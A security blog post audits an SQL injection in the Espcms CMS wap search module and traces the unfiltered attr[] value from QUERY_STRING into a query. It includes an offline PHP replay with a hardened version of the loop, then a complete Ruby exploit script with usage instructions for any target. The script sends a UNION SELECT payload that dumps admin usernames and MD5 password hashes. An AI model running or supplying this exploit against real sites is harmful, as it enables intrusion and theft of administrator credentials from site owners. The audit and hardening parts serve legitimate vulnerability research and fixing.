Code audit: SQL injection in the Espcms wap module and an exploit (EXP)

Category: Seay信息安全博客

The tainted variable travels $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along that path filters it, which is what makes the injection possible.

Because the input is read directly from $_SERVER['QUERY_STRING'] rather than through the request variables the program normally filters, it sidesteps the application's input filtering entirely.

On top of that, the injected variable is the array's value, not its key: the code escapes the key with addslashes() and inputcodetrim() but leaves the value untouched. Together these two conditions produce a fairly uncommon SQL injection.
 
In the in_result function of /interface/3gwap_search.php:
function in_result() {
    ... ... ... ... ... ... ... ... ...
    // read the parameters from $_SERVER['QUERY_STRING']
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // the key is filtered; the value is not
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                // $countnum must be > 0 here for the value to be used
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // the value is concatenated into the SQL statement unescaped
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    // $db_where is concatenated into the SQL statement
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    // the statement is executed
    $rs = $this->db->query($sql);
    ... ... ... ... ... ... ... ... ...
}
 
So by passing an attr[] array whose key is crafted to match an existing attribute name (so that the db_numrows lookup returns $countnum > 0) and whose value carries the payload, SQL injection is achieved.
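The data path above, replayed offline in PHP as an added example (not code from the original post or from Espcms): it runs the same parse_str() step, builds the attr WHERE clause exactly as in_result() does, and then builds it again with the key whitelisted and the value escaped. The $known_attr array standing in for the model_att lookup, the 'espcms_' table prefix, the 'WHERE 1=1' prefix standing in for whatever $db_where holds before the loop, and the query string itself are all constructed for the example.

```php
<?php
// Added example (not Espcms code): replays
// $_SERVER['QUERY_STRING'] -> parse_str() -> $output['attr'] -> $db_where
// offline, then shows a hardened version of the same loop.
// Assumptions: the model_att lookup ($this->db_numrows(...)) is simulated by
// the constructed array $known_attr; the prefix 'espcms_' and the attribute
// name 'jobnum' are taken from the PoC; 'WHERE 1=1' stands in for the part of
// $db_where that the original builds before the attr loop.

// Constructed query string: 'jobnum' is a known attribute and carries the
// payload; 'nope' is not a known attribute.
$query_string = "ac=search&at=result&attr[jobnum]=1%27%20OR%201=1%23&attr[nope]=x";

// Simulated rows of espcms_model_att that have isclass=1.
$known_attr = ['jobnum', 'salary'];

// Stands in for $this->db_numrows($db_table, " WHERE isclass=1 AND attrname='$key'") > 0.
function attr_exists(string $key, array $known_attr): bool
{
    return in_array($key, $known_attr, true);
}

// Vulnerable loop, same logic as in_result(): only the key is escaped,
// the value is concatenated verbatim.
function build_where_vulnerable(array $attr, array $known_attr): string
{
    $db_where = '';
    foreach ($attr as $key => $value) {
        if ($value) {
            $key = addslashes($key);
            if (attr_exists($key, $known_attr)) {
                $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
            }
        }
    }
    return $db_where;
}

// Hardened loop: the key must match a known attribute name exactly, and the
// value is escaped as well. addslashes() mirrors what the original already
// does for the key; the proper fix is to bind $value with a prepared statement.
function build_where_hardened(array $attr, array $known_attr): string
{
    $db_where = '';
    foreach ($attr as $key => $value) {
        if ($value === '' || $value === null) {
            continue;
        }
        if (!attr_exists((string) $key, $known_attr)) {
            continue;   // unknown attribute name: never reaches SQL
        }
        $db_where .= " AND b.`" . $key . "`='" . addslashes((string) $value) . "'";
    }
    return $db_where;
}

// Same parsing step as the original; nothing here filters $output.
parse_str(html_entity_decode($query_string), $output);

$base = "SELECT b.*,a.* FROM espcms_document AS a LEFT JOIN espcms_document_attr AS b ON a.did=b.did WHERE 1=1";

echo "vulnerable: " . $base . build_where_vulnerable($output['attr'], $known_attr) . " LIMIT 0,15\n";
echo "hardened:   " . $base . build_where_hardened($output['attr'], $known_attr) . " LIMIT 0,15\n";
```

Run it with the php CLI. The first SELECT still carries the raw quote and `OR 1=1#` from the attr value, which is the bug; in the second the quote is escaped and attr[nope] is dropped because no such attrname exists. Note that the whitelist is what the original code already has: the attr key only reaches SQL after the model_att lookup succeeds, so the PoC's key jobnum must exist in espcms_model_att with isclass=1, otherwise $countnum stays 0 and the value is never concatenated. addslashes() is a stopgap that matches the original's treatment of the key; in the project's DB layer the value should be bound as a prepared-statement parameter.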
 
PoC:
 
require "net/http"
require "uri"

# send a plain GET and return the Net::HTTPResponse
def request(method, url)
    if method.eql?("get")
        uri = URI.parse(url)
        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
        return response
    end
end

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage:      ruby #{$0} host port path
example:    ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
    puts usage
else
    $host = ARGV[0]
    $port = ARGV[1]
    $path = ARGV[2]
    puts "[*]send request..."
    # attr[jobnum] must be an existing attrname (isclass=1) so that $countnum > 0;
    # the value closes the quote and UNIONs the admin table into the result
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
    response = request("get", url)
    # pick out username&md5hash pairs from the rendered page
    result = response.body.scan(/\w+&\w{32}/)
    puts result
end
Author: 0day
 

Tags: espcms vulnerability, code audit
